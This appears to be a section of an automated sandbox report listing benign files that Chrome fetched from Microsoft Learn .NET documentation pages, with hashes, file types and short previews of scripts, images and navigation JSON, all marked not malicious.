                                                                                                                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):1173007
                                                                                                                                                                        Entropy (8bit):5.503893944397598
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                        MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                        SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                        SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                        SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                        Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                        Entropy (8bit):3.875
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:HMB:k
                                                                                                                                                                        MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                        SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                        SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                        SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                        Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33370
                                                                                                                                                                        Entropy (8bit):7.973675198531228
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                        MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                        SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                        SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                        SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):13339
                                                                                                                                                                        Entropy (8bit):7.683569563478597
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                        MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                        SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                        SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                        SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):1817143
                                                                                                                                                                        Entropy (8bit):5.501007973622959
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                        MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                        SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                        SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                        SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                        Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5644
                                                                                                                                                                        Entropy (8bit):4.785769732002188
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                        MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                        SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                        SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                        SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):13842
                                                                                                                                                                        Entropy (8bit):7.802399161550213
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                        MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                        SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                        SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                        SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                        Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33148
                                                                                                                                                                        Entropy (8bit):4.917595394577667
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                        MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                        SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                        SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                        SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):5644
                                                                                                                                                                        Entropy (8bit):4.785769732002188
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                        MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                        SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                        SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                        SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                        Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):35005
                                                                                                                                                                        Entropy (8bit):7.980061050467981
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                        MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                        SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                        SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                        SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                        Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                        Entropy (8bit):4.8007377074457604
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                        MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                        SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                        SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                        SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                        Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                        Entropy (8bit):4.241202481433726
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1173007
                                                                                                                                                                        Entropy (8bit):5.503893944397598
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                        MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                        SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                        SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                        SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
